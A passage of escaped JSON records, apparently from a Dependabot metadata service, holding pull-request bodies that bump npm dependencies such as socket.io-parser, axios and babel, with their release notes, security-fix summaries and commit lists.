\u003ccode\u003e~4.4.1\u003c/code\u003e.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/522edcdbb89da5eb647abb93c73229d1e91c304f\"\u003e\u003ccode\u003e522edcd\u003c/code\u003e\u003c/a\u003e chore(release): socket.io-parser@4.2.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/3fff7cafa98f1ba5840475b6917c651fe841a943\"\u003e\u003ccode\u003e3fff7ca\u003c/code\u003e\u003c/a\u003e fix(parser): add a limit to the number of binary attachments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/37aad11417d1020cf51d27a0cf90fa367efd5dc1\"\u003e\u003ccode\u003e37aad11\u003c/code\u003e\u003c/a\u003e fix: cleanup pending acks on timeout to prevent memory leak\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/ba9cd6900d0d84678623cd8e3a42165e922f3fbd\"\u003e\u003ccode\u003eba9cd69\u003c/code\u003e\u003c/a\u003e revert: fix: cleanup pending acks on timeout to prevent memory leak\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/84c2fb78217b6375b38e0b47e0d59d7b1b8431d7\"\u003e\u003ccode\u003e84c2fb7\u003c/code\u003e\u003c/a\u003e chore(release): engine.io@6.6.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/07cbe1510ded7e5460cb82e026e2533e50e30eaf\"\u003e\u003ccode\u003e07cbe15\u003c/code\u003e\u003c/a\u003e fix(eio): add \u003ccode\u003e@​types/ws\u003c/code\u003e as dependency (\u003ca href=\"https://redirect.github.com/socketio/socket.io/issues/5458\"\u003e#5458\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/44ed73f53995d35ef0c8d10df6806d5687238282\"\u003e\u003ccode\u003e44ed73f\u003c/code\u003e\u003c/a\u003e fix(eio): emit initial_headers and headers events in uServer (\u003ca href=\"https://redirect.github.com/socketio/socket.io/issues/5460\"\u003e#5460\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/da04267ffc7b0903ca91f2fccb80e56246d13328\"\u003e\u003ccode\u003eda04267\u003c/code\u003e\u003c/a\u003e fix: cleanup pending acks on timeout to prevent memory leak (\u003ca href=\"https://redirect.github.com/socketio/socket.io/issues/5442\"\u003e#5442\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/74599a6b9e3dbeff1a9efe46c305d5d25d6e3dd8\"\u003e\u003ccode\u003e74599a6\u003c/code\u003e\u003c/a\u003e fix(types): properly import http module\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/socketio/socket.io/commit/d48718cb675721fc1252775115592ebd1b255899\"\u003e\u003ccode\u003ed48718c\u003c/code\u003e\u003c/a\u003e ci: use actions/checkout@v6 and actions/setup-node@v6 (\u003ca href=\"https://redirect.github.com/socketio/socket.io/issues/5449\"\u003e#5449\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/socketio/socket.io/compare/socket.io-parser@4.2.4...socket.io-parser@4.2.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for socket.io-parser since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `axios` from 0.30.3 to 1.16.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.32.0 — May 4, 2026\u003c/h2\u003e\n\u003cp\u003eThis release backports a comprehensive set of security and hardening fixes from the v1.x branch into v0.x, covering prototype-pollution protections, default error redaction, stricter proxy/cookie/socket handling, and one breaking change to merged config and header object prototypes.\u003c/p\u003e\n\u003ch2\u003e⚠️ Breaking Changes \u0026amp; Deprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNull-prototype merged objects: mergeConfig and header merging now return objects with a null prototype to block prototype-pollution gadgets. Consumers must use Object.prototype.hasOwnProperty.call(obj, key) and avoid implicit string coercion against merged config or header objects. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDefault error redaction: AxiosError.toJSON() now redacts sensitive keys by default to prevent credential leaks in logs. The behavior is configurable via config.redact, with defaults exposed on defaults.redact. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCookie \u0026amp; XSRF handling: Cookie names are read literally rather than via regex, and only own properties are respected when evaluating withXSRFToken. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eProxy bypass IPv6 parity: NO_PROXY matching now handles canonical IPv4-mapped IPv6 forms such as ::ffff:127.0.0.1 and ::ffff:7f00:1. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNode http adapter hardening: Strips Proxy-Authorization when no proxy is in use and gates socketPath behind a new allowedSocketPaths allowlist (string or array, normalized) to reduce accidental Unix socket exposure. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBrowser xhr adapter: Stricter own-property checks when reading config and headers. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eURL parameters: AxiosURLSearchParams keeps %00 encoded and applies consistent encoding throughout. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePublic type surface: Adds formDataHeaderPolicy, redact, and allowedSocketPaths to the TypeScript declarations alongside their runtime defaults. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRepo hygiene: Updates README.md and CHANGELOG.md, adds AGENTS.md, and refreshes the issue and PR templates. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v0.31.1...v0.32.0\"\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.31.1\u003c/h2\u003e\n\u003cp\u003eThis release backports a broad set of security hardenings from the v1 line — covering prototype-pollution defences, stream size enforcement, XSRF handling, URL null-byte encoding, and bounded FormData recursion — and drops committed \u003ccode\u003edist/\u003c/code\u003e artefacts along with Bower support.\u003c/p\u003e\n\u003ch2\u003e⚠️ Breaking Changes \u0026amp; Deprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBower \u0026amp; Committed \u003ccode\u003edist/\u003c/code\u003e Removed:\u003c/strong\u003e \u003ccode\u003edist/\u003c/code\u003e bundles are no longer committed to the repo, and \u003ccode\u003ebower.json\u003c/code\u003e plus the Grunt \u003ccode\u003epackage2bower\u003c/code\u003e task have been removed. CI still builds bundles before publish, so npm/yarn/pnpm consumers are unaffected; installs via Bower or directly from the git tree must migrate to npm or a CDN. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10747\"\u003e#10747\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution in Header Merge (GHSA-6chq-wfr3-2hj9):\u003c/strong\u003e Tightened \u003ccode\u003eisFormData\u003c/code\u003e to reject plain/null-prototype objects and require \u003ccode\u003eappend\u003c/code\u003e, and guarded the Node HTTP adapter so \u003ccode\u003edata.getHeaders()\u003c/code\u003e is only merged when it is not inherited from \u003ccode\u003eObject.prototype\u003c/code\u003e. Blocks injected headers via polluted \u003ccode\u003egetHeaders\u003c/code\u003e. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10750\"\u003e#10750\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution in Config Merging (GHSA-pf86-5x62-jrwf):\u003c/strong\u003e \u003ccode\u003emergeConfig\u003c/code\u003e, defaults resolution, and the HTTP adapter now uses own-property checks for \u003ccode\u003etransport\u003c/code\u003e, \u003ccode\u003eenv\u003c/code\u003e, \u003ccode\u003eBlob\u003c/code\u003e, \u003ccode\u003eformSerializer\u003c/code\u003e, and transforms arrays, and merged configs are returned as null-prototype objects. Prevents hijacking of the request flow through polluted prototypes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10752\"\u003e#10752\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFormData / Params Recursion DoS:\u003c/strong\u003e Added a configurable \u003ccode\u003emaxDepth\u003c/code\u003e (default \u003ccode\u003e100\u003c/code\u003e, \u003ccode\u003eInfinity\u003c/code\u003e disables) to \u003ccode\u003etoFormData\u003c/code\u003e and params serialisation, throwing \u003ccode\u003eAxiosError\u003c/code\u003e with code \u003ccode\u003eERR_FORM_DATA_DEPTH_EXCEEDED\u003c/code\u003e when exceeded. Circular-reference detection is preserved. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10728\"\u003e#10728\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNull-Byte Injection in Query Strings:\u003c/strong\u003e Removed the unsafe \u003ccode\u003e%00\u003c/code\u003e → null-byte substitution from \u003ccode\u003eAxiosURLSearchParams.encode\u003c/code\u003e so \u003ccode\u003e%00\u003c/code\u003e is preserved as-is. Other encoding behaviour (including \u003ccode\u003e%20\u003c/code\u003e → \u003ccode\u003e+\u003c/code\u003e) unchanged. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10737\"\u003e#10737\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eConsolidated v1 Security Backport:\u003c/strong\u003e Rolls up remaining v1 hardenings into \u003ccode\u003ev0.x\u003c/code\u003e: \u003ccode\u003emaxContentLength\u003c/code\u003e enforcement for \u003ccode\u003eresponseType: 'stream'\u003c/code\u003e via a guarded transform with deferred piping, \u003ccode\u003emaxBodyLength\u003c/code\u003e enforcement for streamed uploads on native \u003ccode\u003ehttp\u003c/code\u003e/\u003ccode\u003ehttps\u003c/code\u003e with \u003ccode\u003emaxRedirects: 0\u003c/code\u003e, and stricter \u003ccode\u003ewithXSRFToken\u003c/code\u003e handling so only own boolean \u003ccode\u003etrue\u003c/code\u003e enables cross-origin XSRF headers. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10764\"\u003e#10764\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCODEOWNERS:\u003c/strong\u003e Added \u003ccode\u003e.github/CODEOWNERS\u003c/code\u003e with \u003ccode\u003e* @jasonsaayman\u003c/code\u003e to set a default reviewer for all paths. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10740\"\u003e#10740\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v0.31.0...v0.31.1\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.31.0\u003c/h2\u003e\n\u003cp\u003eThis release backports security fixes from v1.x, hardens the CI/CD supply chain with OIDC publishing and \u003ccode\u003ezizmor\u003c/code\u003e scanning, resolves TypeScript typing issues in \u003ccode\u003eAxiosInstance\u003c/code\u003e, and fixes a performance regression in \u003ccode\u003eisEmptyObject()\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/8db2d44896849a21ed9721185b1034df24e1ba7b\"\u003e\u003ccode\u003e8db2d44\u003c/code\u003e\u003c/a\u003e chore: bump version to v0.32.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10840\"\u003e#10840\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/2af6116a957b1dd1b32056181326da8a5540d3bc\"\u003e\u003ccode\u003e2af6116\u003c/code\u003e\u003c/a\u003e chore: backport fixes from the v1x branch (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/a589dc525af12e0fabef7d6e5be028ad433eee31\"\u003e\u003ccode\u003ea589dc5\u003c/code\u003e\u003c/a\u003e chore: bump version to v0.31.1 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10766\"\u003e#10766\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/b0c632f36a5ea2e73c9bdf3a54164a8ede925736\"\u003e\u003ccode\u003eb0c632f\u003c/code\u003e\u003c/a\u003e fix: backport security issues (\u003ca href=\"https://redirect.gith...\n\n_Description has been truncated_","html_url":"https://github.com/alexcolls/p2p-wallet-web/pull/31","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/alexcolls%2Fp2p-wallet-web/issues/31","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/31/packages"}},{"old_version":"4.15.1","new_version":"5.2.3","update_type":"major","path":null,"pr_created_at":"2026-05-29T08:05:42.000Z","version_change":"4.15.1 → 5.2.3","issue":{"uuid":"4546813238","node_id":"PR_kwDOKdAFf87gjxJJ","number":47,"state":"closed","title":"Bump the npm_and_yarn group across 12 directories with 14 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-30T04:19:13.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-29T08:05:42.000Z","updated_at":"2026-05-30T04:19:15.000Z","time_to_close":72811,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":14,"packages":[{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.22.11","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"follow-redirects","old_version":"1.15.3","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"tmp","old_version":"0.2.1","new_version":"0.2.7","repository_url":"https://github.com/raszi/node-tmp"},{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"postcss","old_version":"8.4.27","new_version":"8.5.12","repository_url":"https://github.com/postcss/postcss"},{"name":"serialize-javascript","old_version":"6.0.1","new_version":"7.0.5"},{"name":"vite","old_version":"4.4.7","new_version":"7.3.2","repository_url":"https://github.com/vitejs/vite"},{"name":"webpack-dev-server","old_version":"4.15.1","new_version":"5.2.3"},{"name":"postcss","old_version":"8.4.31","new_version":"8.5.15","repository_url":"https://github.com/postcss/postcss"},{"name":"vite","old_version":"4.4.9","new_version":"4.5.14","repository_url":"https://github.com/vitejs/vite"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 4 updates in the /tasks/angular/easy/hello directory: [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs), [follow-redirects](https://github.com/follow-redirects/follow-redirects), [tmp](https://github.com/raszi/node-tmp) and [lodash](https://github.com/lodash/lodash).\nBumps the npm_and_yarn group with 3 updates in the /tasks/astro/easy/hello directory: [postcss](https://github.com/postcss/postcss), [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) and [astro](https://github.com/withastro/astro/tree/HEAD/packages/astro).\nBumps the npm_and_yarn group with 1 update in the /tasks/electron/easy directory: [electron](https://github.com/electron/electron).\nBumps the npm_and_yarn group with 1 update in the /tasks/graphql/easy directory: [@protobufjs/utf8](https://github.com/dcodeIO/protobuf.js).\nBumps the npm_and_yarn group with 1 update in the /tasks/laravel/easy/greeting_app directory: [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).\nBumps the npm_and_yarn group with 2 updates in the /tasks/nextjs/easy/nextjs-easy directory: [postcss](https://github.com/postcss/postcss) and [next](https://github.com/vercel/next.js).\nBumps the npm_and_yarn group with 2 updates in the /tasks/react/easy/react-easy directory: [postcss](https://github.com/postcss/postcss) and [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).\nBumps the npm_and_yarn group with 3 updates in the /tasks/svelte/easy/hello directory: [postcss](https://github.com/postcss/postcss), [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) and [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /tasks/tailwind directory: [postcss](https://github.com/postcss/postcss).\nBumps the npm_and_yarn group with 2 updates in the /tasks/typescript/vitest/easy directory: [postcss](https://github.com/postcss/postcss) and [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).\nBumps the npm_and_yarn group with 3 updates in the /tasks/vue/easy/todo-list directory: [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs), [follow-redirects](https://github.com/follow-redirects/follow-redirects) and [lodash](https://github.com/lodash/lodash).\nBumps the npm_and_yarn group with 3 updates in the /tasks/vue/medium/vue-task-list directory: [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs), [follow-redirects](https://github.com/follow-redirects/follow-redirects) and [lodash](https://github.com/lodash/lodash).\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.22.11 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/61647ae2397c82c3c71f077b5ab109106a5cac0f\"\u003e\u003ccode\u003e61647ae\u003c/code\u003e\u003c/a\u003e v7.28.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a177d551adba99773f4ff00ea9bf46550def6132\"\u003e\u003ccode\u003ea177d55\u003c/code\u003e\u003c/a\u003e [Babel 8] Use \u003ccode\u003et.traverseFast\u003c/code\u003e to replace some \u003ccode\u003epath.traverse\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17518\"\u003e#17518\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/eebd3a06021c13d335b5b0bd79734df3abbea678\"\u003e\u003ccode\u003eeebd3a0\u003c/code\u003e\u003c/a\u003e v7.27.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/317e332e650bc04907bc787ab79f930288a3e71e\"\u003e\u003ccode\u003e317e332\u003c/code\u003e\u003c/a\u003e Enforce node protocol import (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17207\"\u003e#17207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/fdc0fb59e119ee0b38bced63867a344a5b4bc2f3\"\u003e\u003ccode\u003efdc0fb5\u003c/code\u003e\u003c/a\u003e [Babel 